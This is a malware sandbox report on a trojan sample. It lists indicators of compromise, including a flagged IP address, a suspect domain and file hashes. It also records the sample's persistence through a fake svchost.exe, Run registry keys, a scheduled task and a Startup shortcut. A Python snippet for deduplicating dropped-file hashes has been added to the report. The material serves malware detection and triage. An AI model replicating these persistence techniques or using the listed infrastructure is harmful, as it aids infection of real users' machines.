https://scripts.sil.org/OFLThis | Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://nuget.org/NuGet.exe | Source: powershell.exe, 00000006.00000002.1662916943.000001B29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1783062203.000002239646F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1953909365.000002B02AC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://www.apache.org/licenses/LICENSE-2.0 | Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | Malicious: false | Reputation: high
https://ion=v4.5alC | Source: powershell.exe, 00000009.00000002.1798528406.000002239EB4A000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://pesterbdd.com/images/Pester.png | Source: powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://schemas.xmlsoap.org/soap/encoding/ | Source: powershell.exe, 00000006.00000002.1640787722.000001B280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ADC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://www.apache.org/licenses/LICENSE-2.0.html | Source: powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://discord.gg/sGNBaJSzYDstart | Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | Malicious: false | Reputation: high
http://www.microsoft.co | Source: powershell.exe, 00000009.00000002.1798379341.000002239EA00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1973377511.000002B033142000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://contoso.com/License | Source: powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://crl.mic | Source: powershell.exe, 00000009.00000002.1798528406.000002239EB66000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://contoso.com/Icon | Source: powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad | Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://github.com/Pester/Pester | Source: powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://curl.haxx.se/docs/http-cookies.html | Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | Malicious: false | Reputation: high
http://crl.m | Source: powershell.exe, 0000000E.00000002.1973377511.000002B033102000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://qualityboy.rdcw.xyz/ | Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.microsu.S | Source: powershell.exe, 00000012.00000002.2194708953.0000017F73B80000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://qualityboy.rdcw.xyz/slumzickx | Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://schemas.xmlsoap.org/wsdl/ | Source: powershell.exe, 00000006.00000002.1640787722.000001B280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ADC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://contoso.com/ | Source: powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://nuget.org/nuget.exe | Source: powershell.exe, 00000006.00000002.1662916943.000001B29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1783062203.000002239646F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1953909365.000002B02AC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://ip-api.com | Source: svchost.exe, 00000003.00000002.2787361809.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://discord.gg/sGNBaJSzYD | Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | Malicious: false | Reputation: high
http://crl.micft.cMicRosof | Source: powershell.exe, 00000009.00000002.1798528406.000002239EB66000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://aka.ms/pscore68 | Source: powershell.exe, 00000006.00000002.1640787722.000001B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ABA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00001000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: svchost.exe, 00000003.00000002.2787361809.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1640787722.000001B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ABA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00001000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://github.com/itfoundry/Poppins)&&&&s | Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | Malicious: false | Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | Malicious: false
45.141.26.134 | unknown | Netherlands | 62068 | SPECTRAIPSpectraIPBVNL | Malicious: true
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1583457
                                                                  Start date and time:2025-01-02 20:09:20 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 42s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:25
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:file.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@26/25@1/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 11.1%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 92
                                                                  • Number of non-executed functions: 4
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45, 173.222.162.55
                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target ALL slumzick.exe, PID 6120 because there are no executed function
                                                                  • Execution Graph export aborted for target All function.exe, PID 4400 because it is empty
                                                                  • Execution Graph export aborted for target file.exe, PID 4576 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 3444 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 6956 because it is empty
                                                                  • Execution Graph export aborted for target svchost.exe, PID 1196 because it is empty
                                                                  • Execution Graph export aborted for target svchost.exe, PID 6828 because it is empty
                                                                  • Execution Graph export aborted for target svchost.exe, PID 7008 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • VT rate limit hit for: file.exe
Time | Type | Description
14:10:51 | API Interceptor | 57x Sleep call for process: powershell.exe modified
14:11:51 | API Interceptor | 101x Sleep call for process: svchost.exe modified
20:11:52 | Task Scheduler | Run new task: svchost path: C:\Users\user\AppData\Roaming\svchost.exe
20:11:52 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
20:12:12 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
20:12:32 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Match | Associated Sample Name / URL | Detection | Threat Name (context listed beneath each row)
208.95.112.1 | 23khy505ab.exe | malicious | Njrat
• ip-api.com/line/?fields=hosting
208.95.112.1 | XClient.exe | malicious | AsyncRAT, XWorm
• ip-api.com/line/?fields=hosting
208.95.112.1 | Java32.exe | malicious | XWorm
• ip-api.com/line/?fields=hosting
208.95.112.1 | mcgen.exe | malicious | Blank Grabber
• ip-api.com/json/?fields=225545
208.95.112.1 | intro.avi.exe | malicious | Quasar
• ip-api.com/json/
208.95.112.1 | AimStar.exe | malicious | Blank Grabber
• ip-api.com/json/?fields=225545
208.95.112.1 | L988Ph5sKX.exe | malicious | XWorm
• ip-api.com/line/?fields=hosting
208.95.112.1 | kj93GnZHBS.exe | malicious | AsyncRAT, XWorm
• ip-api.com/line/?fields=hosting
208.95.112.1 | ANuh30XoVu.exe | malicious | XWorm
• ip-api.com/line/?fields=hosting
208.95.112.1 | rivalsanticheat.exe | malicious | XWorm
• ip-api.com/line/?fields=hosting
Match | Associated Sample Name / URL | Detection | Threat Name (context listed beneath each row)
ip-api.com | 23khy505ab.exe | malicious | Njrat
• 208.95.112.1
ip-api.com | XClient.exe | malicious | AsyncRAT, XWorm
• 208.95.112.1
ip-api.com | Java32.exe | malicious | XWorm
• 208.95.112.1
ip-api.com | mcgen.exe | malicious | Blank Grabber
• 208.95.112.1
ip-api.com | intro.avi.exe | malicious | Quasar
• 208.95.112.1
ip-api.com | AimStar.exe | malicious | Blank Grabber
• 208.95.112.1
ip-api.com | L988Ph5sKX.exe | malicious | XWorm
• 208.95.112.1
ip-api.com | kj93GnZHBS.exe | malicious | AsyncRAT, XWorm
• 208.95.112.1
ip-api.com | ANuh30XoVu.exe | malicious | XWorm
• 208.95.112.1
ip-api.com | rivalsanticheat.exe | malicious | XWorm
• 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name (context listed beneath each row)
SPECTRAIPSpectraIPBVNL | XClient.exe | malicious | AsyncRAT, XWorm
• 45.141.26.234
SPECTRAIPSpectraIPBVNL | Java32.exe | malicious | XWorm
• 45.141.26.234
SPECTRAIPSpectraIPBVNL | nklmips.elf | malicious | Unknown
• 89.190.159.77
SPECTRAIPSpectraIPBVNL | 1.elf | malicious | Unknown
• 45.141.239.79
SPECTRAIPSpectraIPBVNL | TRC.ppc.elf | malicious | Mirai
• 45.144.191.245
SPECTRAIPSpectraIPBVNL | da6ke5KbfB.exe | malicious | AsyncRAT, Babadeda, XWorm
• 45.141.26.234
SPECTRAIPSpectraIPBVNL | 03VPFXH490.exe | malicious | AsyncRAT, XWorm
• 45.141.26.234
SPECTRAIPSpectraIPBVNL | saiya.exe | malicious | AsyncRAT, XWorm
• 45.141.26.134
SPECTRAIPSpectraIPBVNL | windxcmd.exe | malicious | AsyncRAT, XWorm
• 45.141.26.134
SPECTRAIPSpectraIPBVNL | mips.nn.elf | malicious | Mirai, Okiru
• 45.138.53.54
TUT-ASUS | 23khy505ab.exe | malicious | Njrat
• 208.95.112.1
TUT-ASUS | XClient.exe | malicious | AsyncRAT, XWorm
• 208.95.112.1
TUT-ASUS | Java32.exe | malicious | XWorm
• 208.95.112.1
TUT-ASUS | mcgen.exe | malicious | Blank Grabber
• 208.95.112.1
TUT-ASUS | intro.avi.exe | malicious | Quasar
• 208.95.112.1
TUT-ASUS | AimStar.exe | malicious | Blank Grabber
• 208.95.112.1
TUT-ASUS | L988Ph5sKX.exe | malicious | XWorm
• 208.95.112.1
TUT-ASUS | kj93GnZHBS.exe | malicious | AsyncRAT, XWorm
• 208.95.112.1
TUT-ASUS | ANuh30XoVu.exe | malicious | XWorm
• 208.95.112.1
TUT-ASUS | rivalsanticheat.exe | malicious | XWorm
• 208.95.112.1
                                                                  No context
                                                                  No context
                                                                  Process:C:\Users\user\AppData\Roaming\All function.exe
                                                                  File Type:CSV text
                                                                  Category:dropped
                                                                  Size (bytes):654
                                                                  Entropy (8bit):5.380476433908377
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:CSV text
                                                                  Category:dropped
                                                                  Size (bytes):654
                                                                  Entropy (8bit):5.380476433908377
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                  Malicious:true
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:Unknown
                                                                  Category:dropped
                                                                  Size (bytes):654
                                                                  Entropy (8bit):5.380476433908377
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
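The three records above are byte-identical (same SHA-256, the .NET native-image binding log written by every managed process) yet one copy is flagged Malicious:true and the others false, and one is typed "Unknown" instead of "CSV text". With 25 dropped files in this report, collapsing the list to unique hashes and surfacing such verdict conflicts is the first triage step. The Python below is an added example, not part of the Joe Sandbox report; its input is constructed from the entries above in the report's own "Key:Value" layout, trimmed to the fields it uses, and the conflict rule is the example's own.

```python
"""Collapse dropped-file records to unique SHA-256 values and surface hashes
whose copies received conflicting Malicious verdicts. Added example; the input
records are constructed from the report's entries, reduced to the fields used."""
from collections import defaultdict

# Hashes as shown in the report's dropped-file entries.
CSV_HASH = "A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63"
APPLOCKER_HASH = "96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7"

# Constructed input in the report's "Key:Value" record layout; a new record
# starts at each "Process:" line.
SAMPLE_RECORDS = rf"""
Process:C:\Users\user\AppData\Roaming\All function.exe
File Type:CSV text
Category:dropped
Size (bytes):654
SHA-256:{CSV_HASH}
Malicious:false
Process:C:\Users\user\Desktop\file.exe
File Type:CSV text
Category:dropped
Size (bytes):654
SHA-256:{CSV_HASH}
Malicious:true
Process:C:\Users\user\AppData\Roaming\svchost.exe
File Type:Unknown
Category:dropped
Size (bytes):654
SHA-256:{CSV_HASH}
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
SHA-256:{APPLOCKER_HASH}
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
SHA-256:{APPLOCKER_HASH}
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
"""


def parse_records(text: str) -> list:
    """Split 'Key:Value' lines into one dict per dropped file. Only the first
    colon separates key from value, so paths, SSDEEP and previews survive intact."""
    records, current = [], None
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue  # blank or stray line
        key = key.strip()
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value.strip()
    return records


def group_by_hash(records: list) -> dict:
    """Map SHA-256 -> {count, writing processes, set of Malicious verdicts}."""
    groups = defaultdict(lambda: {"count": 0, "processes": set(), "verdicts": set()})
    for r in records:
        h = r.get("SHA-256", "").upper()
        if len(h) != 64:
            continue  # record without a usable hash
        g = groups[h]
        g["count"] += 1
        g["processes"].add(r.get("Process", "?"))
        g["verdicts"].add(r.get("Malicious", "?").lower())
    return dict(groups)


def conflicting_verdicts(groups: dict) -> list:
    """Hashes whose identical copies were labelled both malicious and not."""
    return sorted(h for h, g in groups.items() if len(g["verdicts"]) > 1)


if __name__ == "__main__":
    groups = group_by_hash(parse_records(SAMPLE_RECORDS))
    for h, g in groups.items():
        print(f"{h[:16]}... x{g['count']} from {len(g['processes'])} process(es), "
              f"verdicts={sorted(g['verdicts'])}")
    print("conflicting:", conflicting_verdicts(groups))
```

A verdict should follow the bytes, not the writing process, so a hash that appears in the conflict list is worth resolving by hand: here the content is a CLR binding log that every .NET process emits, and the single "true" is the flag to discount, not the two "false" entries.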
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):0.34726597513537405
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlll:Nll
                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                  Malicious:false
                                                                  Preview:@...e...........................................................
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):64
                                                                  Entropy (8bit):4.5201541487443
                                                                  Encrypted:false
                                                                  SSDEEP:3:rRSFgCXfMKt2cWRA4kvRovNsr4rNrn:EFfXfMm2RUZoWrcBn
                                                                  MD5:DDF180221099BE333DFC2D1663DA57F3
                                                                  SHA1:4E7DFBA06988D7DE02A9D9D1313C722E76F15706
                                                                  SHA-256:4CF62923639FDA31E8F1C5B04462D300C422156EB49AD7ECE009FD44D4DF3A2F
                                                                  SHA-512:61A3BFE21D6B56711CA2E08AF9DFC0FDB538AE3DB1651A1F9A6B76F8FCA83C2EC47B90F8B855262C21F922B40B89D11FE8A44F3A196E3898A4D8CF62BED89C81
                                                                  Malicious:false
                                                                  Preview:....### ALL slumzick.exe - System Error ###..[WIN]r[WIN]r[WIN]r
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\AppData\Roaming\All function.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):14620672
                                                                  Entropy (8bit):1.5206619847778025
                                                                  Encrypted:false
                                                                  SSDEEP:49152:AYtLbnFXIUBXA6emScu5nNX0kib2IXCsi:V3XfeZX0kq2mCl
                                                                  MD5:735BD603CC2800BDB3972CC2B561E86A
                                                                  SHA1:35178565EDC8FCF97812722D3129881F8DD3BC95
                                                                  SHA-256:378DCDF213CB54D381732A1EF5E9881CEC416246B0B83C847D5DEF4017DFFA39
                                                                  SHA-512:FF0E9D7433D8003676BEDB44432B7E8490B4EC75DFD5F44C4F3A6C0AB9DC083BD0380A4AECCBA73FB429455BD49FEB99D1D841D5D076C687A8694952A418C575
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........h..;..;..;..;..;.Nx;..;.N.:..;.N.:..;.N.:..;.N.:..;H..:..;...:..;M..:..;..:..;..:..;...;..;..;..;.N.:..;.Nz;..;.N.:..;Rich..;........PE..d......g.........."....&.............m.........@.............................p............`....................................................l....@.......`...............P.......I..p....................J..(...@H..@............................................text...@........................... ..`.rdata...........0..................@..@.data............h..................@....pdata.......`.......,..............@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):14709248
                                                                  Entropy (8bit):5.073506080361151
                                                                  Encrypted:false
                                                                  SSDEEP:49152:tMMQ22U0u5E2YvhkBjyYLKze/vsplbITimRulHFc8k2PE:tMnrhKKz6vsp/m2rPE
                                                                  MD5:A23632476984A0D607DBF76B1096432F
                                                                  SHA1:47C78AE1D0FF1E3EF1CCC6B229086C355EDFFFD0
                                                                  SHA-256:BA87298065DEC0671A3194454A08F0B3671A78087A4043548B7FCCA9E229D8A4
                                                                  SHA-512:A6482876A6B99048ACB64EA46B7CFD4ADCD55537E7EA25C7CFD353BC57C224336750F5024008832F2EDDF1D358DA19E7CFAC1ABAC23D21FCD8272313820FBF6C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 83%
